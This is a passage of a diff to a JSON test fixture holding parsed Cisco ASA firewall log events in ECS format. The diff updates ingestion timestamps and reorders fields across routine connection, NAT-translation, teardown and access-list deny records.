(172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099263900Z", + "ingested": "2021-12-14T14:39:19.188464712Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099269800Z", + "ingested": "2021-12-14T14:39:19.188465090Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099274100Z", + "ingested": "2021-12-14T14:39:19.188465495Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099278300Z", + "ingested": "2021-12-14T14:39:19.188465876Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099281900Z", + "ingested": "2021-12-14T14:39:19.188466261Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099286300Z", + "ingested": "2021-12-14T14:39:19.188466690Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", 
@@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099292200Z", + "ingested": "2021-12-14T14:39:19.188467163Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099297900Z", + "ingested": "2021-12-14T14:39:19.188467554Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099303900Z", + "ingested": "2021-12-14T14:39:19.188468035Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099309800Z", + "ingested": "2021-12-14T14:39:19.188468422Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099315500Z", + "ingested": "2021-12-14T14:39:19.188468818Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", 
@@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099321300Z", + "ingested": "2021-12-14T14:39:19.188469213Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099327100Z", + "ingested": "2021-12-14T14:39:19.188469616Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099332800Z", + "ingested": "2021-12-14T14:39:19.188470011Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099338600Z", + "ingested": "2021-12-14T14:39:19.188470389Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099344300Z", + "ingested": "2021-12-14T14:39:19.188470779Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099350Z", + "ingested": "2021-12-14T14:39:19.188471161Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099355700Z", + "ingested": "2021-12-14T14:39:19.188471671Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099361500Z", + "ingested": "2021-12-14T14:39:19.188472110Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099367200Z", + "ingested": "2021-12-14T14:39:19.188472494Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099373Z", + "ingested": "2021-12-14T14:39:19.188472875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", 
@@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099378800Z", + "ingested": "2021-12-14T14:39:19.188473265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099382900Z", + "ingested": "2021-12-14T14:39:19.188473672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099387500Z", + "ingested": "2021-12-14T14:39:19.188474077Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099392600Z", + "ingested": "2021-12-14T14:39:19.188474461Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099397400Z", + "ingested": "2021-12-14T14:39:19.188474848Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", 
@@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099403200Z", + "ingested": "2021-12-14T14:39:19.188475241Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099407500Z", + "ingested": "2021-12-14T14:39:19.188476059Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099411800Z", + "ingested": "2021-12-14T14:39:19.188476525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099416200Z", + "ingested": "2021-12-14T14:39:19.188477060Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099422100Z", + "ingested": "2021-12-14T14:39:19.188477448Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099427800Z", + "ingested": "2021-12-14T14:39:19.188477825Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6063,25 +6060,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099433800Z", + "ingested": "2021-12-14T14:39:19.188478335Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099439600Z", + "ingested": "2021-12-14T14:39:19.188478733Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6157,25 +6154,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099445400Z", + "ingested": "2021-12-14T14:39:19.188479493Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099451100Z", + "ingested": "2021-12-14T14:39:19.188479880Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6251,25 +6248,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099456800Z", + "ingested": "2021-12-14T14:39:19.188480270Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099462500Z", + "ingested": "2021-12-14T14:39:19.188480657Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099468200Z", + "ingested": "2021-12-14T14:39:19.188481046Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099490100Z", + "ingested": "2021-12-14T14:39:19.188481436Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099512400Z", + "ingested": "2021-12-14T14:39:19.188481904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099518200Z", + "ingested": "2021-12-14T14:39:19.188482302Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099577300Z", + "ingested": "2021-12-14T14:39:19.188482691Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099586Z", + "ingested": "2021-12-14T14:39:19.188483077Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099590Z", + "ingested": "2021-12-14T14:39:19.188483465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099596200Z", + "ingested": "2021-12-14T14:39:19.188483917Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099601200Z", + "ingested": "2021-12-14T14:39:19.188484310Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099606800Z", + "ingested": "2021-12-14T14:39:19.188484705Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099612900Z", + "ingested": "2021-12-14T14:39:19.188485097Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099618800Z", + "ingested": "2021-12-14T14:39:19.188485479Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099639800Z", + "ingested": "2021-12-14T14:39:19.188485865Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099645500Z", + "ingested": "2021-12-14T14:39:19.188486325Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099667900Z", + "ingested": "2021-12-14T14:39:19.188486765Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.099673500Z", + "ingested": "2021-12-14T14:39:19.188487154Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099679200Z", + "ingested": "2021-12-14T14:39:19.188487667Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099684800Z", + "ingested": "2021-12-14T14:39:19.188488054Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099688900Z", + "ingested": "2021-12-14T14:39:19.188488430Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099692300Z", + "ingested": "2021-12-14T14:39:19.188488827Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099696600Z", + "ingested": "2021-12-14T14:39:19.188489217Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", 
@@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099701700Z", + "ingested": "2021-12-14T14:39:19.188489602Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099706500Z", + "ingested": "2021-12-14T14:39:19.188489996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099712200Z", + "ingested": "2021-12-14T14:39:19.188490385Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099716400Z", + "ingested": "2021-12-14T14:39:19.188490771Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099720700Z", + "ingested": "2021-12-14T14:39:19.188491285Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", 
